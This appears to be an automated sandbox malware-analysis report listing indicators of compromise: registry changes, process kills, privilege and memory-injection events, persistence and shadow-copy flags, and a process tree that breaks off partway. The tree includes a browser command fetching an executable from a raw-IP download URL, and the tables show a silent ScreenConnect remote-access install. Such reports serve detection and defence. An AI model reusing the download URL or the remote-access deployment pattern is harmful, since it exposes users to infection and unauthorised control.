Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 25 IoCs

pid	Process
9952	Process not Found
12492	Process not Found
93932	Process not Found
6460	taskkill.exe
6136	taskkill.exe
2272	taskkill.exe
5260	taskkill.exe
93112	Process not Found
9784	Process not Found
9808	Process not Found
5308	taskkill.exe
2720	taskkill.exe
6644	taskkill.exe
5512	taskkill.exe
90012	Process not Found
9800	Process not Found
9940	Process not Found
9900	Process not Found
5964	taskkill.exe
13508	Process not Found
93548	Process not Found
93952	Process not Found
9812	Process not Found
9984	Process not Found
9956	Process not Found

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133850766549930489"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe

Modifies registry class 39 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000_Classes\Local Settings	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3996797005-1442104920-3698332314-1000_Classes\Local Settings	firefox.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon"	msiexec.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 117911.crdownload:SmartScreen	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
50608	Process not Found
69976	Process not Found

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1340	msedge.exe
1340	msedge.exe
3936	msedge.exe
3936	msedge.exe
2560	identity_helper.exe
2560	identity_helper.exe
1904	msedge.exe
1904	msedge.exe
224	2N2602.exe
224	2N2602.exe
224	2N2602.exe
224	2N2602.exe
224	2N2602.exe
224	2N2602.exe
348	3P97i.exe
348	3P97i.exe
348	3P97i.exe
348	3P97i.exe
348	3P97i.exe
348	3P97i.exe
3672	chrome.exe
3672	chrome.exe
468	q3na5Mc.exe
468	q3na5Mc.exe
468	q3na5Mc.exe
468	q3na5Mc.exe
5816	chrome.exe
5816	chrome.exe
5264	bgUvqLl.exe
5264	bgUvqLl.exe
6896	taskmgr.exe
6896	taskmgr.exe
348	3P97i.exe
348	3P97i.exe
6896	taskmgr.exe
5264	bgUvqLl.exe
5264	bgUvqLl.exe
5264	bgUvqLl.exe
5264	bgUvqLl.exe
5836	msedge.exe
5836	msedge.exe
7036	msedge.exe
7036	msedge.exe
7092	msedge.exe
7092	msedge.exe
7092	msedge.exe
7092	msedge.exe
6896	taskmgr.exe
6896	taskmgr.exe
468	q3na5Mc.exe
468	q3na5Mc.exe
468	q3na5Mc.exe
468	q3na5Mc.exe
1156	msedge.exe
1156	msedge.exe
6896	taskmgr.exe
6628	msedge.exe
6628	msedge.exe
6516	Y9WG5Ep.exe
6516	Y9WG5Ep.exe
6612	msedge.exe
6612	msedge.exe
6612	msedge.exe
6612	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
6896	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 52 IoCs

pid	Process
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3672	chrome.exe
3672	chrome.exe
3672	chrome.exe
3672	chrome.exe
5816	chrome.exe
5816	chrome.exe
5816	chrome.exe
5816	chrome.exe
7036	msedge.exe
7036	msedge.exe
6628	msedge.exe
6628	msedge.exe
6008	msedge.exe
6008	msedge.exe
6788	msedge.exe
6788	msedge.exe
732	msedge.exe
732	msedge.exe
6664	msedge.exe
6664	msedge.exe
5876	msedge.exe
5876	msedge.exe
7012	msedge.exe
7012	msedge.exe
1420	msedge.exe
1420	msedge.exe
3852	msedge.exe
3852	msedge.exe
5748	msedge.exe
5748	msedge.exe
6104	msedge.exe
6104	msedge.exe
2448	msedge.exe
2448	msedge.exe
5544	msedge.exe
5544	msedge.exe
3876	msedge.exe
3876	msedge.exe
1416	msedge.exe
1416	msedge.exe
155836	Process not Found
155836	Process not Found
155836	Process not Found
155836	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3672	chrome.exe
Token: SeCreatePagefilePrivilege	3672	chrome.exe
Token: SeShutdownPrivilege	3672	chrome.exe
Token: SeCreatePagefilePrivilege	3672	chrome.exe
Token: SeShutdownPrivilege	3672	chrome.exe
Token: SeCreatePagefilePrivilege	3672	chrome.exe
Token: SeShutdownPrivilege	3672	chrome.exe
Token: SeCreatePagefilePrivilege	3672	chrome.exe
Token: SeShutdownPrivilege	3672	chrome.exe
Token: SeCreatePagefilePrivilege	3672	chrome.exe
Token: SeShutdownPrivilege	5816	chrome.exe
Token: SeCreatePagefilePrivilege	5816	chrome.exe
Token: SeShutdownPrivilege	5816	chrome.exe
Token: SeCreatePagefilePrivilege	5816	chrome.exe
Token: SeShutdownPrivilege	5816	chrome.exe
Token: SeCreatePagefilePrivilege	5816	chrome.exe
Token: SeShutdownPrivilege	5816	chrome.exe
Token: SeCreatePagefilePrivilege	5816	chrome.exe
Token: SeShutdownPrivilege	5816	chrome.exe
Token: SeCreatePagefilePrivilege	5816	chrome.exe
Token: SeDebugPrivilege	6896	taskmgr.exe
Token: SeSystemProfilePrivilege	6896	taskmgr.exe
Token: SeCreateGlobalPrivilege	6896	taskmgr.exe
Token: SeShutdownPrivilege	5816	chrome.exe
Token: SeCreatePagefilePrivilege	5816	chrome.exe
Token: SeShutdownPrivilege	5816	chrome.exe
Token: SeCreatePagefilePrivilege	5816	chrome.exe
Token: 33	6896	taskmgr.exe
Token: SeIncBasePriorityPrivilege	6896	taskmgr.exe
Token: SeDebugPrivilege	5684	firefox.exe
Token: SeDebugPrivilege	5684	firefox.exe
Token: SeDebugPrivilege	6460	taskkill.exe
Token: SeDebugPrivilege	5308	taskkill.exe
Token: SeDebugPrivilege	5964	taskkill.exe
Token: SeDebugPrivilege	6136	taskkill.exe
Token: SeDebugPrivilege	2720	taskkill.exe
Token: SeDebugPrivilege	6644	taskkill.exe
Token: SeDebugPrivilege	5512	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	5260	taskkill.exe
Token: SeDebugPrivilege	1776	67e0HNq.exe
Token: SeShutdownPrivilege	6972	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6972	msiexec.exe
Token: SeSecurityPrivilege	4360	msiexec.exe
Token: SeCreateTokenPrivilege	6972	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	6972	msiexec.exe
Token: SeLockMemoryPrivilege	6972	msiexec.exe
Token: SeIncreaseQuotaPrivilege	6972	msiexec.exe
Token: SeMachineAccountPrivilege	6972	msiexec.exe
Token: SeTcbPrivilege	6972	msiexec.exe
Token: SeSecurityPrivilege	6972	msiexec.exe
Token: SeTakeOwnershipPrivilege	6972	msiexec.exe
Token: SeLoadDriverPrivilege	6972	msiexec.exe
Token: SeSystemProfilePrivilege	6972	msiexec.exe
Token: SeSystemtimePrivilege	6972	msiexec.exe
Token: SeProfSingleProcessPrivilege	6972	msiexec.exe
Token: SeIncBasePriorityPrivilege	6972	msiexec.exe
Token: SeCreatePagefilePrivilege	6972	msiexec.exe
Token: SeCreatePermanentPrivilege	6972	msiexec.exe
Token: SeBackupPrivilege	6972	msiexec.exe
Token: SeRestorePrivilege	6972	msiexec.exe
Token: SeShutdownPrivilege	6972	msiexec.exe
Token: SeDebugPrivilege	6972	msiexec.exe
Token: SeAuditPrivilege	6972	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3672	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
3936	msedge.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe
6896	taskmgr.exe

Suspicious use of SetWindowsHookEx 35 IoCs

pid	Process
5684	firefox.exe
5684	firefox.exe
5684	firefox.exe
5684	firefox.exe
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found
94684	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3936 wrote to memory of 3984	3936	msedge.exe	84
PID 3936 wrote to memory of 3984	3936	msedge.exe	84
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1224	3936	msedge.exe	85
PID 3936 wrote to memory of 1340	3936	msedge.exe	86
PID 3936 wrote to memory of 1340	3936	msedge.exe	86
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87
PID 3936 wrote to memory of 2808	3936	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://185.215.113.40/duna/random.exe
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffd234646f8,0x7ffd23464708,0x7ffd23464718
  2⤵
  PID:3984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:1224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:1340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8
  2⤵
  PID:2808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:3304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,6779403649738016891,2997722780772662307,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
